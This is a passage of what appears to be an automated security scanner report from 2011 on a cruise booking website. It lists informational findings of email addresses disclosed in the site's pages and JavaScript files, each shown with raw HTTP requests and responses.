           document.EmailForm1.email.select();        
return false;
}else if (document.EmailForm1.zip.value == ""){
           alert ("Your Zip/Postal code is a required field.")
...[SNIP]...
ield.");
           document.EmailForm2.email.focus();
return false;
       }else if (!ValidEmail(document.EmailForm2.email)){
           alert ("Please enter a Valid Email Address.\r(e.g., yourname@provider.com)")
           document.EmailForm2.email.select();        
return false;

       }else{
           CallTracker('SearchResults/ForcedRegistration', 'ClickSubmit', 'AlreadyMember');
       
...[SNIP]...
20.23. http://www.cruisesonly.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruisesonly.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:40:41 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Cteonnt-Length: 107318
Content-Type: text/html
Cache-control: private
Content-Length: 107318


<script language="javascript" src="/lib/javascript/ajax/jquery/jquery-1.6.3.min.js" type="text/javascript"></script>
<script language="javascript" src="/Code/javascript/ajax/jquery/jquery.form.js"
...[SNIP]...
<a href='mailto:customerservice@cruisesonly.com' class='smlink'>
...[SNIP]...
20.24. http://www.cruisesonly.com/Code/JavaScript/general/msgbox.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruisesonly.com
Path:   /Code/JavaScript/general/msgbox.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Code/JavaScript/general/msgbox.js HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruisesonly.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Cteonnt-Length: 12104
Content-Type: application/x-javascript
Last-Modified: Wed, 17 Sep 2008 14:44:28 GMT
Accept-Ranges: bytes
ETag: "e6d171e3d318c91:6ad4"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:40:44 GMT
Content-Length: 12104

//-----------------------------------------------------------------------------------------|
//-----------------------------------------------------------------------------------------|
// $Header: /WebSites/library/javascript/general/msgbox.js 13 8/24/07 12:59p Bpena $
//
// AUTHOR: Jeff Kody (kodyj@nlg.com)
// CREATED: 7/20/2005
// MODIFICATION HISTORY:
// PURPOSE: this file contains objects and static methods for displaying
//                            dynamic inline message windows. I
...[SNIP]...
20.25. http://www.cruisesonly.com/Code/javascript/general/browserdetect_lite.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruisesonly.com
Path:   /Code/javascript/general/browserdetect_lite.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Code/javascript/general/browserdetect_lite.js HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruisesonly.com/sc.do?d=09/07/2011&d2=03/06/2014&i=848192&c=11&v=58&IncludeAlumniRates=&IncludeSeniorRates=&state=&zipcode=&dsc=y
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D; sid=6386; JSESSIONID=E5DDBE0407B36DF2815ADD375CCA88F0; NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d2245525d5f4f58455e445a4a423660; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.3.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Cteonnt-Length: 4269
Content-Type: application/x-javascript
Last-Modified: Wed, 17 Sep 2008 14:44:29 GMT
Accept-Ranges: bytes
ETag: "3e56f7e3d318c91:6ad4"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:41:20 GMT
Content-Length: 4269

// Browser Detect Lite v2.1
// http://www.dithered.com/javascript/browser_detect/index.html
// modified by Chris Nott (chris@NOSPAMdithered.com - remove NOSPAM)
//
// modified by Michael Lovitt to include OmniWeb and Dreamcast

function BrowserDetectLite() {
   var ua = navigator.userAgent.toLowerCase();
   this.ua = ua;

   // browser nam
...[SNIP]...
20.26. http://www.cruisesonly.com/Code/javascript/general/event.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruisesonly.com
Path:   /Code/javascript/general/event.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Code/javascript/general/event.js HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruisesonly.com/promotion/bermuda-cruises.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; JSESSIONID=E5DDBE0407B36DF2815ADD375CCA88F0; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.5.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D1c8fe390ed9e4354eaa4e6f; IncludeAlumniRates=1c8fe3904be4744e95f12c08; AlumniCruiseId=false; shoppingZipCode="Zip Code"; sid=6386; partnerStamp=21960764; AFF%5FCID=6386; NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Cteonnt-Length: 1267
Content-Type: application/x-javascript
Last-Modified: Wed, 17 Sep 2008 14:44:29 GMT
Accept-Ranges: bytes
ETag: "272ff0e3d318c91:6ad4"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:45:23 GMT
Content-Length: 1267

//-----------------------------------------------------------------------------------------|
//-----------------------------------------------------------------------------------------|
// AUTHOR: Jeff Kody (kodyj@nlg.com)
// CREATED: 11/17/2005
// MODIFICATION HISTORY:
// PURPOSE: this file contains objects that handle event-based programming
//                            in javascript
//--------------
...[SNIP]...
20.27. http://www.cruisesonly.com/Code/javascript/general/validation.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruisesonly.com
Path:   /Code/javascript/general/validation.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Code/javascript/general/validation.js HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruisesonly.com/promotion/bermuda-cruises.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; JSESSIONID=E5DDBE0407B36DF2815ADD375CCA88F0; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.5.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D1c8fe390ed9e4354eaa4e6f; IncludeAlumniRates=1c8fe3904be4744e95f12c08; AlumniCruiseId=false; shoppingZipCode="Zip Code"; sid=6386; partnerStamp=21960764; AFF%5FCID=6386; NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Cteonnt-Length: 2687
Content-Type: application/x-javascript
Last-Modified: Thu, 28 Apr 2011 09:32:34 GMT
Accept-Ranges: bytes
ETag: "c2808334875cc1:6ad4"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:45:25 GMT
Content-Length: 2687


// Description : General javascript validation functions.
// File            : validation.js
// Created By    : Sanjeev Joshi(joshis@NLG.com)
// Created Date : 06/12/03


// The possible options for the zip to be invalid are
// 00000 or -ve number (parseFloat(vZip)<=0)
// // "." in the Zip entered ((vZip.indexOf('.') !== -1) )
// Al
...[SNIP]...
20.28. http://www.cruisesonly.com/Code/javascript/validation/validating.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruisesonly.com
Path:   /Code/javascript/validation/validating.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Code/javascript/validation/validating.js HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruisesonly.com/promotion/bermuda-cruises.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; JSESSIONID=E5DDBE0407B36DF2815ADD375CCA88F0; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.5.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D1c8fe390ed9e4354eaa4e6f; IncludeAlumniRates=1c8fe3904be4744e95f12c08; AlumniCruiseId=false; shoppingZipCode="Zip Code"; sid=6386; partnerStamp=21960764; AFF%5FCID=6386; NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Cteonnt-Length: 4597
Content-Type: application/x-javascript
Last-Modified: Thu, 19 Aug 2010 09:39:37 GMT
Accept-Ranges: bytes
ETag: "f8139470823fcb1:6ad4"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:45:25 GMT
Content-Length: 4597

// validates email sign up form
// $Header: /WebSites/library/javascript/validation/validating.js 1 7/28/10 9:07a Mccusker $

function validating(){
   if ((document.EmailForm.firstname.
...[SNIP]...
eld.");
           document.EmailForm.email.focus();
return false;
       }else if (!validateEmail(document.EmailForm.email)){
           alert ("Please enter a Valid Email Address.\r(e.g., yourname@provider.com)")
           document.EmailForm.email.select();        
return false;
}else if (document.EmailForm.zip.value == ""){
           alert ("Your zip code is a required field.")
           
...[SNIP]...
eld.");
           document.EmailForm.email.focus();
return false;
       }else if (!validateEmail(document.EmailForm.email)){
           alert ("Please enter a Valid Email Address.\r(e.g., yourname@provider.com)")
           document.EmailForm.email.select();        
return false;
}else if (document.EmailForm.zip.value == ""){
           alert ("Your zip code is a required field.")
           
...[SNIP]...
20.29. http://www.cruisesonly.com/cs/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruisesonly.com
Path:   /cs/default.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /cs/default.asp HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruisesonly.com/groupcruises/promos/whatisgroup.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D; sid=6386; JSESSIONID=E5DDBE0407B36DF2815ADD375CCA88F0; NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d2245525d5f4f58455e445a4a423660; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.4.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:56 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Cteonnt-Length: 95828
Content-Type: text/html
Set-Cookie: AFF%5FCID=%22%22; expires=Wed, 02-Nov-2011 04:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDACRRBDRT=LCAAOGNALNLIEDHCBDAMGOOP; path=/
Cache-control: private
Content-Length: 95828


<script language="JavaScript">


    function CallUrchin(event_name)
{
       
           pageTracker._trackPageview(event_name);
           //alert(event_name);
       
       return true;
}
...[SNIP]...
<a href='mailto:customerservice@cruisesonly.com' class='smlink'>
...[SNIP]...
20.30. http://www.cruisesonly.com/groupcruises/promos/whatisgroup.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruisesonly.com
Path:   /groupcruises/promos/whatisgroup.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /groupcruises/promos/whatisgroup.asp HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruisesonly.com/sc.do?d=09/07/2011&d2=03/06/2014&i=848192&c=11&v=58&IncludeAlumniRates=&IncludeSeniorRates=&state=&zipcode=&dsc=y
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D; sid=6386; JSESSIONID=E5DDBE0407B36DF2815ADD375CCA88F0; NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d2245525d5f4f58455e445a4a423660; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.3.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:04 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Cteonnt-Length: 55607
Content-Type: text/html
Set-Cookie: AFF%5FCID=%22%22; expires=Wed, 02-Nov-2011 04:00:00 GMT; path=/
Cache-control: private
Content-Length: 55607


<script language="javascript" src="/code/webdata/webdataregister.asp?webdataID=1910"></script>

<script language="javascript" src="/Code/javascript/JSPopup.js"></script>
<script language="java
...[SNIP]...
equired field.");
       document.EmailForm.email.focus();
return false;
   }else if (!ValidEmail(document.EmailForm.email)){
       alert ("Please enter a Valid Email Address.\r(e.g., yourname@provider.com)")
       document.EmailForm.email.select();        
return false;
}else if (parseFloat(document.EmailForm.zip.value)<=0 || isNaN(document.EmailForm.zip.value) || (document.EmailForm.
...[SNIP]...
dress is a required field.");
        document.EmailForm.email.focus();
        return false;
       }else if (!ValidEmail(document.EmailForm.email)){
        alert ("Please enter a Valid Email Address.\r(e.g., yourname@provider.com)")
        document.EmailForm.email.select();        
        return false;
       }else{
        document.EmailForm.submit();
        }        
   }

</script>
...[SNIP]...
20.31. http://www.cruisesonly.com/includes/search_ads.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruisesonly.com
Path:   /includes/search_ads.css

Issue detail

The following email address was disclosed in the response:

Request

GET /includes/search_ads.css HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.cruisesonly.com/promotion/bermuda-cruises.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; JSESSIONID=E5DDBE0407B36DF2815ADD375CCA88F0; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.5.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D1c8fe390ed9e4354eaa4e6f; IncludeAlumniRates=1c8fe3904be4744e95f12c08; AlumniCruiseId=false; shoppingZipCode="Zip Code"; sid=6386; partnerStamp=21960764; AFF%5FCID=6386; NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 404 file not found
Date: Mon, 03 Oct 2011 12:45:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Cteonnt-Length: 46271
Content-Type: text/html
Set-Cookie: AFF%5FCID=6386; expires=Wed, 02-Nov-2011 04:00:00 GMT; path=/
Cache-control: private
Content-Length: 46271


<noscript>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=/lib/global/jscookiehelp.asp?js=N">
</noscript>
<script language='Javascript'><!--function DummyBrowserCheck11() {
...[SNIP]...
<a href='mailto:customerservice@cruisesonly.com' class='smlink'>
...[SNIP]...
20.32. http://www.cruisesonly.com/includes/stylesheet_test.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruisesonly.com
Path:   /includes/stylesheet_test.css

Issue detail

The following email address was disclosed in the response:

Request

GET /includes/stylesheet_test.css HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.cruisesonly.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d2245525d5f4f58455e445a4a423660; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.2.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 file not found
Date: Mon, 03 Oct 2011 12:40:52 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Cteonnt-Length: 45933
Content-Type: text/html
Cache-control: private
Content-Length: 45933


<noscript>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=/lib/global/jscookiehelp.asp?js=N">
</noscript>
<script language='Javascript'><!--function DummyBrowserCheck11() {
...[SNIP]...
<a href='mailto:customerservice@cruisesonly.com' class='smlink'>
...[SNIP]...
20.33. http://www.cruisesonly.com/lib/JavaScript/general/browserdetect_lite.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruisesonly.com
Path:   /lib/JavaScript/general/browserdetect_lite.js

Issue detail

The following email address was disclosed in the response:

Request

GET /lib/JavaScript/general/browserdetect_lite.js HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruisesonly.com/sc.do?d=09/07/2011&d2=03/06/2014&i=848192&c=11&v=58&IncludeAlumniRates=&IncludeSeniorRates=&state=&zipcode=&dsc=y
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D; sid=6386; JSESSIONID=E5DDBE0407B36DF2815ADD375CCA88F0; NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d2245525d5f4f58455e445a4a423660; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.3.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Cteonnt-Length: 4323
Content-Type: application/x-javascript
Last-Modified: Thu, 14 Jul 2011 09:29:43 GMT
Accept-Ranges: bytes
ETag: "f833090842cc1:6ad4"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:41:19 GMT
Content-Length: 4323

// Browser Detect Lite v2.1
// http://www.dithered.com/javascript/browser_detect/index.html
// modified by Chris Nott (chris@NOSPAMdithered.com - remove NOSPAM)
//
// modified by Michael Lovitt to include OmniWeb and Dreamcast

function BrowserDetectLite() {
   var ua = navigator.userAgent.toLowerCase();
   this.ua = ua;

   // browser nam
...[SNIP]...
20.34. http://www.cruisesonly.com/lib/javascript/ajax/logerror.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruisesonly.com
Path:   /lib/javascript/ajax/logerror.js

Issue detail

The following email address was disclosed in the response:

Request

GET /lib/javascript/ajax/logerror.js HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruisesonly.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660

Response

HTTP/1.1 404 file not found
Date: Mon, 03 Oct 2011 12:40:45 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Cteonnt-Length: 45933
Content-Type: text/html
Cache-control: private
Content-Length: 45933


<noscript>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=/lib/global/jscookiehelp.asp?js=N">
</noscript>
<script language='Javascript'><!--function DummyBrowserCheck11() {
...[SNIP]...
<a href='mailto:customerservice@cruisesonly.com' class='smlink'>
...[SNIP]...
20.35. http://www.cruisesonly.com/lib/javascript/general/event.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruisesonly.com
Path:   /lib/javascript/general/event.js

Issue detail

The following email address was disclosed in the response:

Request

GET /lib/javascript/general/event.js HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
